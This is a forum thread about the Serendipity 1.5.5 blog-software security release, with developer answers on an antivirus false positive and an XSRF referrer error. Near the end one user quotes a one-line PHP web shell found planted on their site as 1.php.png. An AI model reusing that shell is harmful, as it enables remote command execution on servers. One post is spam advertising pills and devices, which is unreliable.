Hi!
Serendipity 1.5.5 has been released to address a serious security issue. Please read http://blog.s9y.org/archives/224-Import ... eased.html
Regards,
Garvin
Serendipity 1.5.5 released: IMPORTANT Security Fix
-
- Core Developer
- Posts: 30022
- Joined: Tue Sep 16, 2003 9:45 pm
- Location: Cologne, Germany
- Contact:
Serendipity 1.5.5 released: IMPORTANT Security Fix
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
Hi...I'm sorry, but I've found a virus named Obfuscated in plugins\QuickTag\tag-lib.js (AVG Antivirus). Can I safely upgrade serendipity 1.5.5 after the virus elimination?
Thanks
e.
Thanks
e.
-
- Core Developer
- Posts: 30022
- Joined: Tue Sep 16, 2003 9:45 pm
- Location: Cologne, Germany
- Contact:
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
Hi!
tag-lib.js uses javascript encryption to make the size smaller; this is called "compression". Even though some trojans use this technique, it does not inherently mean a security issue. In this case, the tag-lib.js file does not contain any trojan and is meant to be that way.
If you still feel uncomfortable, you can of course delete that file - it is only required for a specific feature of the Xinha WYSIWYG editing component ("QuickTags").
HTH,
Garvin
tag-lib.js uses javascript encryption to make the size smaller; this is called "compression". Even though some trojans use this technique, it does not inherently mean a security issue. In this case, the tag-lib.js file does not contain any trojan and is meant to be that way.
If you still feel uncomfortable, you can of course delete that file - it is only required for a specific feature of the Xinha WYSIWYG editing component ("QuickTags").
HTH,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
-
- Regular
- Posts: 13
- Joined: Sat Feb 07, 2009 12:54 pm
- Location: DE
- Contact:
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
Hi,
after I updates S9Y to Version 1.5.5 I cannot create new entrys. I have got the following error alert "Ihr Browser hat keinen gültigen HTTP-Referrer übermittelt. Dies kann entweder daher kommen, dass Ihr Browser/Proxy nicht korrekt konfiguriert ist, oder dass Sie Opfer einer "Cross Site Request Forgery (XSRF)" waren, mit der man Sie zu ungewollten Änderungen zwingen wollte. Die angeforderte Aktion konnte daher nicht durchgeführt werden."
I updated 3 Blogs of my blogs. It´s the same problem on each blog. I tested it on Internet Explorer 8 Firefox and Chrome! Same problem!
after I updates S9Y to Version 1.5.5 I cannot create new entrys. I have got the following error alert "Ihr Browser hat keinen gültigen HTTP-Referrer übermittelt. Dies kann entweder daher kommen, dass Ihr Browser/Proxy nicht korrekt konfiguriert ist, oder dass Sie Opfer einer "Cross Site Request Forgery (XSRF)" waren, mit der man Sie zu ungewollten Änderungen zwingen wollte. Die angeforderte Aktion konnte daher nicht durchgeführt werden."
I updated 3 Blogs of my blogs. It´s the same problem on each blog. I tested it on Internet Explorer 8 Firefox and Chrome! Same problem!
-
- Core Developer
- Posts: 30022
- Joined: Tue Sep 16, 2003 9:45 pm
- Location: Cologne, Germany
- Contact:
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
Hi!
From which version did you upgrade from? Did you change anything in your PHP installation and/or .htaccess?
The error usually only happens if the PHP sessions mismatch, or your browser does not submit a "HTTP Referer" string. Also make sure you use the blog domain name to login that is configured inside s9y as the HTTP host.
HTH,
Garvin
From which version did you upgrade from? Did you change anything in your PHP installation and/or .htaccess?
The error usually only happens if the PHP sessions mismatch, or your browser does not submit a "HTTP Referer" string. Also make sure you use the blog domain name to login that is configured inside s9y as the HTTP host.
HTH,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
I downloaded 1.5.5 LITE yesterday. Is that download already patched? Or do I need to patch it?
-
- Regular
- Posts: 3652
- Joined: Mon Feb 13, 2006 2:40 am
- Location: Chicago, IL, USA
- Contact:
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
the lite version should also be the upgraded version.
=Don=
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
I haven't updated some of my blogs for years! Better do this one then!
Check out this blog today!
Buy Eye Secrets strips.
Best devices reviewed at http://www.penisstretchers.org/.
Order Capsiplex slimming pills today.
Buy Meratol diet pills online.
Buy Eye Secrets strips.
Best devices reviewed at http://www.penisstretchers.org/.
Order Capsiplex slimming pills today.
Buy Meratol diet pills online.
-
- Regular
- Posts: 56
- Joined: Sun May 18, 2008 5:50 pm
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
I've just installed the new version. While checking I found a file called
1.php.png
containing the line <?PHP system($_GET['cmd']); ?>
Looking at the logfile for the site, it had been accessed and they were looking for 1.php.jpg and 2.php.jpg
1.php.png
containing the line <?PHP system($_GET['cmd']); ?>
Looking at the logfile for the site, it had been accessed and they were looking for 1.php.jpg and 2.php.jpg
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
Looks like I should update. I have over 50 blogs that I haved updated in years.